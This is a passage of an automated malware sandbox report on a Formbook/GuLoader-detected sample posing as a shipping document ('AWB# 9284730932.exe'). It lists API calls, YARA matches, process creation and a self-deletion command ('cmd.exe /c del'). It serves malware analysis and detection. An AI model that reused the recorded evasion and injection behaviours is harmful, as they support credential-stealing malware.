      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F96D0 NtCreateKey,LdrInitializeThunk,14_2_030F96D0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F96E0 NtFreeVirtualMemory,LdrInitializeThunk,14_2_030F96E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,14_2_030F9910
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F9540 NtReadFile,LdrInitializeThunk,14_2_030F9540
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F99A0 NtCreateSection,LdrInitializeThunk,14_2_030F99A0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F95D0 NtClose,LdrInitializeThunk,14_2_030F95D0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F9840 NtDelayExecution,LdrInitializeThunk,14_2_030F9840
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F9860 NtQuerySystemInformation,LdrInitializeThunk,14_2_030F9860
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F9B00 NtSetValueKey,14_2_030F9B00
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030FA710 NtOpenProcessToken,14_2_030FA710
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030EE730 NtQueryInformationProcess,14_2_030EE730
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030B9335 NtClose,NtClose,14_2_030B9335
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F9730 NtQueryVirtualMemory,14_2_030F9730
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F7742 NtAllocateVirtualMemory,14_2_030F7742
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F9760 NtOpenProcess,14_2_030F9760
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03137365 NtQuerySystemInformation,14_2_03137365
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0314176C NtWaitForSingleObject,NtClose,14_2_0314176C
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0317FF69 NtQueryVirtualMemory,14_2_0317FF69
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F9770 NtSetInformationFile,14_2_030F9770
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030FA770 NtOpenThread,14_2_030FA770
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030C8F87 NtProtectVirtualMemory,NtProtectVirtualMemory,14_2_030C8F87
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0313FB88 NtProtectVirtualMemory,14_2_0313FB88
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F97A0 NtUnmapViewOfSection,14_2_030F97A0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030BA7B0 NtClose,NtClose,14_2_030BA7B0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03185BA5 NtQueryInformationToken,14_2_03185BA5
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030FA3B0 NtGetContextThread,14_2_030FA3B0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0317AFDE NtFreeVirtualMemory,14_2_0317AFDE
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0317F7DD NtFreeVirtualMemory,14_2_0317F7DD
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030BF7C0 NtClose,14_2_030BF7C0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03166BEA NtQueryVirtualMemory,14_2_03166BEA
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030BC600 NtQueryValueKey,NtQueryValueKey,14_2_030BC600
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F9A00 NtProtectVirtualMemory,14_2_030F9A00
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F2E1C NtDelayExecution,14_2_030F2E1C
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0317F209 NtFreeVirtualMemory,NtFreeVirtualMemory,14_2_0317F209
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F9610 NtEnumerateValueKey,14_2_030F9610
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F9A10 NtQuerySection,14_2_030F9A10
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030BE620 NtClose,14_2_030BE620
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F9A20 NtResumeThread,14_2_030F9A20
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0317EE22 NtFreeVirtualMemory,14_2_0317EE22
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030B9240 NtClose,NtClose,14_2_030B9240
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03141242 NtUnmapViewOfSection,NtClose,NtClose,NtClose,NtClose,NtClose,14_2_03141242
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F9650 NtQueryValueKey,14_2_030F9650
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030EBE62 NtProtectVirtualMemory,14_2_030EBE62
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F9660 NtAllocateVirtualMemory,14_2_030F9660
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03137E63 NtProtectVirtualMemory,14_2_03137E63
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F9670 NtQueryInformationProcess,14_2_030F9670
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0316BE9B NtAllocateVirtualMemory,14_2_0316BE9B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F9A80 NtOpenDirectoryObject,14_2_030F9A80
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030B2E9F NtClose,14_2_030B2E9F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030ED294 NtClose,14_2_030ED294
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030B52A5 NtClose,NtClose,NtClose,NtClose,14_2_030B52A5
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03180EA5 NtQueryVirtualMemory,14_2_03180EA5
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03141AD6 NtFreeVirtualMemory,14_2_03141AD6
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030D4120 NtClose,14_2_030D4120
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F9520 NtWaitForSingleObject,14_2_030F9520
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0316FD22 NtQueryInformationProcess,14_2_0316FD22
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030C9136 NtProtectVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,14_2_030C9136
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030EC532 NtProtectVirtualMemory,14_2_030EC532
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030FAD30 NtSetContextThread,14_2_030FAD30
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030E0548 NtQueryVirtualMemory,14_2_030E0548
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03181D55 NtFreeVirtualMemory,14_2_03181D55
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03133540 NtQueryValueKey,NtClose,14_2_03133540
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F9950 NtQueueApcThread,14_2_030F9950
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03141570 NtQuerySystemInformation,NtClose,14_2_03141570
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F9560 NtWriteFile,14_2_030F9560
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030B2D8A NtWaitForSingleObject,14_2_030B2D8A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030CDD80 NtQueryVirtualMemory,14_2_030CDD80
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031419C8 NtCreateSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,14_2_031419C8
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F99D0 NtCreateProcessEx,14_2_030F99D0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0316BDFA NtAllocateVirtualMemory,14_2_0316BDFA
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F95F0 NtQueryInformationFile,14_2_030F95F0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F9820 NtEnumerateKey,14_2_030F9820
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0314C450 NtAdjustPrivilegesToken,NtClose,NtClose,14_2_0314C450
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030FB040 NtSuspendThread,14_2_030FB040
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03141C49 NtQueryInformationProcess,14_2_03141C49
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030D746D NtClose,14_2_030D746D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03141C76 NtQueryInformationProcess,14_2_03141C76
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03141879 NtAllocateVirtualMemory,14_2_03141879
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03133884 NtQueryValueKey,NtQueryValueKey,14_2_03133884
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F98A0 NtWriteVirtualMemory,14_2_030F98A0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030BDCA4 NtEnumerateKey,NtClose,NtClose,14_2_030BDCA4
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030EF0BF NtClose,NtClose,14_2_030EF0BF
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0314B8D0 NtAdjustPrivilegesToken,NtAdjustPrivilegesToken,NtClose,NtClose,14_2_0314B8D0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0317F8C5 NtFreeVirtualMemory,14_2_0317F8C5
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03137CF9 NtQueryVirtualMemory,14_2_03137CF9
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03141CE4 NtQueryInformationProcess,14_2_03141CE4
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030C80FC NtMapViewOfSection,NtUnmapViewOfSection,14_2_030C80FC
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030F98F0 NtReadVirtualMemory,14_2_030F98F0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02F39E80 NtClose,14_2_02F39E80
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02F39E00 NtReadFile,14_2_02F39E00
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02F39D50 NtCreateFile,14_2_02F39D50
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02F39E7B NtReadFile,14_2_02F39E7B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02F39E7D NtClose,14_2_02F39E7D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02F39DA2 NtCreateFile,14_2_02F39DA2
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_00166550: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,14_2_00166550
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0016374E InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,lstrcmpW,CreateProcessW,CloseHandle,GetLastError,GetLastError,DeleteProcThreadAttributeList,_local_unwind4,CreateProcessAsUserW,GetLastError,CloseHandle,14_2_0016374E
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3C6E3011_2_1E3C6E30
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3DEBB011_2_1E3DEBB0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3B841F11_2_1E3B841F
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E46100211_2_1E461002
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D20A011_2_1E3D20A0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3BB09011_2_1E3BB090
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E471D5511_2_1E471D55
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3A0D2011_2_1E3A0D20
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3C412011_2_1E3C4120
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3AF90011_2_1E3AF900
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3D258111_2_1E3D2581
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3BD5E011_2_1E3BD5E0
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_0008106911_2_00081069
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_0008986211_2_00089862
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_0008107211_2_00081072
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_00082CEC11_2_00082CEC
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_00082CF211_2_00082CF2
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_0008813211_2_00088132
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_0008AA3211_2_0008AA32
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_00085B1F11_2_00085B1F
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_00085B2211_2_00085B22
      Source: C:\Windows\explorer.exeCode function: 13_2_0674E07213_2_0674E072
      Source: C:\Windows\explorer.exeCode function: 13_2_0675686213_2_06756862
      Source: C:\Windows\explorer.exeCode function: 13_2_0675AA6F13_2_0675AA6F
      Source: C:\Windows\explorer.exeCode function: 13_2_0674E06913_2_0674E069
      Source: C:\Windows\explorer.exeCode function: 13_2_06757A3213_2_06757A32
      Source: C:\Windows\explorer.exeCode function: 13_2_0674FCF213_2_0674FCF2
      Source: C:\Windows\explorer.exeCode function: 13_2_0674FCEC13_2_0674FCEC
      Source: C:\Windows\explorer.exeCode function: 13_2_0675513213_2_06755132
      Source: C:\Windows\explorer.exeCode function: 13_2_06752B2213_2_06752B22
      Source: C:\Windows\explorer.exeCode function: 13_2_06752B1F13_2_06752B1F
      Source: C:\Windows\explorer.exeCode function: 13_2_0675AB0E13_2_0675AB0E
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0015D80314_2_0015D803
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0015E04014_2_0015E040
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_00159CF014_2_00159CF0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001548E614_2_001548E6
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_00175CEA14_2_00175CEA
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0017350614_2_00173506
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0016655014_2_00166550
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0016196914_2_00161969
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0015719014_2_00157190
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001731DC14_2_001731DC
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0015FA3014_2_0015FA30
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0015522614_2_00155226
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_00155E7014_2_00155E70
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_00158AD714_2_00158AD7
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0015CB4814_2_0015CB48
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_00165FC814_2_00165FC8
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_00176FF014_2_00176FF0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030EEBB014_2_030EEBB0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030D6E3014_2_030D6E30
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030BF90014_2_030BF900
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030B0D2014_2_030B0D20
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030D412014_2_030D4120
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03181D5514_2_03181D55
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030C841F14_2_030C841F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0317100214_2_03171002
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_030CB09014_2_030CB090
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02F3E19B14_2_02F3E19B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02F29E4014_2_02F29E40
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02F22FB014_2_02F22FB0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02F22D9014_2_02F22D90
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02F3E59714_2_02F3E597
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02F22D8714_2_02F22D87
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: String function: 1E3AB150 appears 35 times
      Source: AWB# 9284730932.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: AWB# 9284730932.exe, 00000001.00000002.306371664.0000000000415000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMorgenkvisten.exe vs AWB# 9284730932.exe
      Source: AWB# 9284730932.exe, 00000001.00000002.306907514.0000000000700000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs AWB# 9284730932.exe
      Source: AWB# 9284730932.exe, 0000000B.00000002.368734106.00000000000ED000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs AWB# 9284730932.exe
      Source: AWB# 9284730932.exe, 0000000B.00000000.305549636.0000000000415000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMorgenkvisten.exe vs AWB# 9284730932.exe
      Source: AWB# 9284730932.exe, 0000000B.00000002.373081614.000000001DEF0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs AWB# 9284730932.exe
      Source: AWB# 9284730932.exe, 0000000B.00000002.373626759.000000001E62F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs AWB# 9284730932.exe
      Source: AWB# 9284730932.exe, 0000000B.00000002.373031499.000000001DDA0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs AWB# 9284730932.exe
      Source: AWB# 9284730932.exeBinary or memory string: OriginalFilenameMorgenkvisten.exe vs AWB# 9284730932.exe
      Source: 0000000B.00000002.373125113.000000001E150000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000B.00000002.373125113.000000001E150000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000B.00000002.373146227.000000001E180000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000B.00000002.373146227.000000001E180000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000E.00000002.500985638.000000000025D000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000E.00000002.501858309.0000000002F20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000E.00000002.501858309.0000000002F20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000E.00000002.503105850.000000000383F000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000E.00000002.501396069.0000000000520000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000E.00000002.501396069.0000000000520000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@7/0@4/2
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0015C5CA _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,GetLastError,GetLastError,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,EnterCriticalSection,LeaveCriticalSection,exit,14_2_0015C5CA
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0017A0D2 memset,GetDiskFreeSpaceExW,??_V@YAXPAX@Z,14_2_0017A0D2
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6684:120:WilError_01
      Source: AWB# 9284730932.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: AWB# 9284730932.exeVirustotal: Detection: 28%
      Source: AWB# 9284730932.exeReversingLabs: Detection: 22%
      Source: unknownProcess created: C:\Users\user\Desktop\AWB# 9284730932.exe 'C:\Users\user\Desktop\AWB# 9284730932.exe'
      Source: unknownProcess created: C:\Users\user\Desktop\AWB# 9284730932.exe 'C:\Users\user\Desktop\AWB# 9284730932.exe'
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\AWB# 9284730932.exe'
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeProcess created: C:\Users\user\Desktop\AWB# 9284730932.exe 'C:\Users\user\Desktop\AWB# 9284730932.exe' Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\AWB# 9284730932.exe'Jump to behavior
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32Jump to behavior
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000D.00000000.350047860.0000000006FE0000.00000002.00000001.sdmp
      Source: Binary string: cmd.pdbUGP source: AWB# 9284730932.exe, 0000000B.00000002.373852934.000000001E7F0000.00000040.00000001.sdmp, cmd.exe, 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: AWB# 9284730932.exe, 0000000B.00000002.373424599.000000001E49F000.00000040.00000001.sdmp, cmd.exe, 0000000E.00000002.502312430.00000000031AF000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: AWB# 9284730932.exe, cmd.exe
      Source: Binary string: cmd.pdb source: AWB# 9284730932.exe, 0000000B.00000002.373852934.000000001E7F0000.00000040.00000001.sdmp, cmd.exe
      Source: Binary string: wscui.pdb source: explorer.exe, 0000000D.00000000.350047860.0000000006FE0000.00000002.00000001.sdmp

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: Process Memory Space: AWB# 9284730932.exe PID: 5536, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: AWB# 9284730932.exe PID: 6252, type: MEMORY
      Yara detected VB6 Downloader GenericShow sources
      Source: Yara matchFile source: Process Memory Space: AWB# 9284730932.exe PID: 5536, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: AWB# 9284730932.exe PID: 6252, type: MEMORY
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 1_2_004126C5 push eax; ret 1_2_00412704
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_1E3FD0D1 push ecx; ret 11_2_1E3FD0E4
      Source: C:\Users\user\Desktop\AWB# 9284730932.exeCode function: 11_2_0008E3E6 pushad ; ret 11_2_0008E3E7
      Source: C:\Windows\explorer.exeCode function: 13_2_0675B3E6 pushad ; ret 13_2_0675B3E7
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001676BD push ecx; ret 14_2_001676D0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_001676D1 push ecx; ret 14_2_001676E4
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0310D0D1 push ecx; ret 14_2_0310D0E4
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02F3DA9C push ebx; ret 14_2_02F3DA9D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02F2E3B0 push cs; iretd 14_2_02F2E3BC
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02F3E35B pushad ; ret 14_2_02F3E36C
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02F36835 push ds; ret 14_2_02F36847
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02F37026 push cs; ret 14_2_02F37033
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02F3CEF2 push eax; ret 14_2_02F3CEF8
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_02F3CEFB push eax; ret 14_2_02F3CF62
